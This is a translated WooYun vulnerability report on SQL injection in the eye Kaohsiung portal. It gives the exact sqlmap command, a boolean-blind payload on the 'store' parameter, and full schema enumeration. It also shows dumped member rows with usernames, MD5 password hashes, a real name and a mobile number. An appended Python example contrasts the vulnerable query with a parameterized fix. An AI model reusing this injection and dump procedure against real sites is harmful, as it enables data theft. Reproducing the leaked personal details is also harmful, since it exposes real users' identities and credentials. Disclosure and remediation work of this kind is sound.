
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2015-0157163

Title: SQL injection in the main site of eye高雄入口網 (eye Kaohsiung Portal) exposes the email addresses, real names, passwords and phone numbers of more than 10,000 users (Taiwan region)

Affected vendor: eye高雄入口網

Author: 路人甲

Submitted: 2015-12-01 12:04

Fixed: 2016-01-16 16:32

Published: 2016-01-16 16:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Handed over to a third-party partner (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-01: Details sent to the vendor, awaiting vendor response
2015-12-02: Vendor confirmed the issue; details visible to the vendor only
2015-12-12: Details disclosed to core white hats and relevant domain experts
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public

Brief description:

eye高雄入口網: eating, drinking and entertainment all in one place; Kaohsiung shopping districts, restaurants, featured attractions, MRT shopping districts, Kaohsiung web design, networking and social events, and more.

Detailed description:

URL: http://**.**.**.**/?p=employee&store=513&employee_id=240

$ python sqlmap.py -u "http://**.**.**.**/?p=employee&store=513&employee_id=240" -p store --technique=B --random-agent --batch --threads=10 -D formosal_lovewed -T member -C username,mobile,real_name,password,email --dump --start 1 --stop 5


Database: formosal_lovewed
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 11409 |
+--------+---------+


Database: formosal_lovewed
Table: member
[5 entries]
+-----------------------+------------+-----------+----------------------------------+---------+
| username | mobile | real_name | password | email |
+-----------------------+------------+-----------+----------------------------------+---------+
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
| eling520@**.**.**.** | 0931366603 | 王妤婕 | b0df2094f49150e871278fee627a87a1 | <blank> |
| s8642050@**.**.**.** | <blank> | s8642050 | 2812afd52c2588f8d9bbfb5bb5acc7de | <blank> |
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
+-----------------------+------------+-----------+----------------------------------+---------+

Proof of vulnerability:

---
Parameter: store (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=employee&store=513 AND 1863=1863&employee_id=240
---
back-end DBMS: MySQL >= 5.0.0
current user: 'formosal_shit@localhost'
current user is DBA: False
database management system users [1]:
[*] 'formosal_shit'@'localhost'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1372 |
| SESSION_VARIABLES | 451 |
| GLOBAL_VARIABLES | 437 |
| GLOBAL_STATUS | 341 |
| SESSION_STATUS | 341 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| PARTITIONS | 145 |
| TABLES | 145 |
| STATISTICS | 80 |
| KEY_COLUMN_USAGE | 52 |
| TABLE_CONSTRAINTS | 52 |
| PLUGINS | 42 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| SCHEMA_PRIVILEGES | 18 |
| ENGINES | 9 |
| PROCESSLIST | 4 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: formosal_lovewed
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| store_site_set | 22388 |
| store_permission | 21650 |
| product_self_description | 18515 |
| album_photo | 16303 |
| extend_article_category | 15862 |
| nav | 13396 |
| nav_description | 13396 |
| store_block_description | 12291 |
| member | 11409 |
| store_information_description | 9777 |
| store_block | 8119 |
| store_information | 7607 |
| market_form_ans | 6579 |
| product_attribute | 6180 |
| extend_product_category | 5815 |
| article | 4952 |
| article_description | 4952 |
| treatment_self_description | 4110 |
| product | 3734 |
| product_description | 3734 |
| extend_album_category | 3452 |
| store_category | 3285 |
| store_category_description | 3262 |
| store_askme | 2728 |
| store_askme_reply | 2616 |
| `order` | 2438 |
| store_reservation | 2269 |
| extend_store_category | 2083 |
| store_aboutus_banner | 2058 |
| product_image | 2048 |
| extend_treatment_category | 2007 |
| treatment_image | 1906 |
| cart_detail | 1436 |
| ip_record | 1411 |
| cart | 1324 |
| album | 1175 |
| album_description | 1174 |
| extend_employee_category | 1058 |
| treatment_description | 1027 |
| treatment | 1026 |
| store_description | 917 |
| store | 865 |
| store_signup | 720 |
| circle_image | 609 |
| product_attribute_value | 561 |
| store_index_banner | 542 |
| employee | 474 |
| employee_description | 474 |
| store_theme | 417 |
| order_detail | 156 |
| store_reservation_reply | 147 |
| store_member_information_tab | 145 |
| groupbuy_description | 91 |
| treatment_survey | 86 |
| circle | 83 |
| ascription | 76 |
| category | 55 |
| category_description | 55 |
| store_payment | 41 |
| store_payment_description | 41 |
| link_exchange | 29 |
| branch | 27 |
| permission | 23 |
| extend_groupbuy_category | 18 |
| market_form | 17 |
| order_reply | 15 |
| information_description | 14 |
| block | 13 |
| block_description | 13 |
| information | 13 |
| groupbuy | 12 |
| vote_board | 10 |
| theme | 9 |
| vote_member | 8 |
| it_category | 5 |
| it_category_description | 5 |
| `language` | 3 |
| payment | 3 |
| `user` | 2 |
| platform | 2 |
| store_group | 2 |
| system_set | 2 |
| user_group | 2 |
| vote | 1 |
| vote_description | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: formosal_lovewed
Table: member
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: formosal_lovewed
Table: platform
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=employee&store=513 AND 1863=1863&employee_id=240
---
back-end DBMS: MySQL 5
Database: formosal_lovewed
Table: member
[32 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| active | tinyint(4) |
| alley | varchar(20) |
| area | varchar(20) |
| birthday | date |
| code | varchar(32) |
| country | varchar(50) |
| county | varchar(20) |
| date_added | datetime |
| date_modified | datetime |
| email | varchar(255) |
| floor | varchar(20) |
| floor_hyphen | varchar(20) |
| gender | tinyint(1) |
| is_delete | tinyint(1) |
| lane | varchar(20) |
| last_login | datetime |
| member_grade | tinyint(1) |
| member_id | int(11) |
| mobile | varchar(20) |
| nickname | varchar(50) |
| num_hyphen | varchar(20) |
| number | varchar(20) |
| password | varchar(128) |
| province | varchar(50) |
| real_name | varchar(20) |
| road | varchar(20) |
| second_email | varchar(255) |
| second_tel | varchar(20) |
| store_id | int(11) |
| suite | varchar(20) |
| username | varchar(255) |
| zipcode | varchar(10) |
+---------------+--------------+

Fix recommendation:

Deploy a WAF.
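A WAF in front of the site filters the symptom; the root cause the sqlmap output points to is that the integer `store` value reaches the SQL parser unchanged, so the boolean-blind payload from the report turns the page into a true/false oracle. The following is an added example, not code from the report or from the site (whose source is not shown): the injection-prone query pattern this behaviour implies, beside a version that validates both GET values as integers and binds them as parameters. It assumes a hypothetical `employee` table and uses an in-memory sqlite database with constructed rows in place of the MySQL backend.

```python
import sqlite3

# Constructed in-memory stand-in for the site's MySQL backend. The real
# schema is unknown beyond the sqlmap column listing, so the table is assumed.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE employee (employee_id INTEGER, store_id INTEGER, name TEXT)")
conn.execute("INSERT INTO employee VALUES (240, 513, 'constructed-employee')")


# Hypothetical vulnerable pattern: the GET values are spliced straight into
# the WHERE clause, so an appended predicate changes what the query returns
# and the page's content reveals whether that predicate was true or false.
def lookup_vulnerable(store, employee_id):
    sql = (f"SELECT name FROM employee WHERE store_id = {store} "
           f"AND employee_id = {employee_id}")
    return conn.execute(sql).fetchall()


class BadParameter(ValueError):
    """Raised when a GET value is not the plain integer the handler expects."""


def _as_int(value):
    # Whitelist validation: digits only, so 'AND', '=', spaces never pass.
    if not value.isdigit():
        raise BadParameter(f"expected integer, got {value!r}")
    return int(value)


# Hardened form: validated integers bound as parameters, so the DBMS never
# parses request data as SQL even if validation were later relaxed.
def lookup_safe(store, employee_id):
    sql = "SELECT name FROM employee WHERE store_id = ? AND employee_id = ?"
    return conn.execute(sql, (_as_int(store), _as_int(employee_id))).fetchall()


def demo():
    true_payload = "513 AND 1863=1863"   # the store value from the report
    false_payload = "513 AND 1863=1864"  # constructed false twin of the same predicate
    results = {
        "vuln_true": lookup_vulnerable(true_payload, "240"),    # row returned
        "vuln_false": lookup_vulnerable(false_payload, "240"),  # no row: the oracle
        "safe_normal": lookup_safe("513", "240"),               # legitimate request
    }
    try:
        lookup_safe(true_payload, "240")
        results["safe_payload"] = "accepted"
    except BadParameter:
        results["safe_payload"] = "rejected"
    return results
```

The difference between `vuln_true` and `vuln_false` is exactly the signal a boolean-blind tool measures; the hardened handler rejects the value before any query runs.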

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability rank: 17

Confirmed: 2015-12-02 16:30

Vendor reply:

Thanks for the report.

Latest status:

None yet.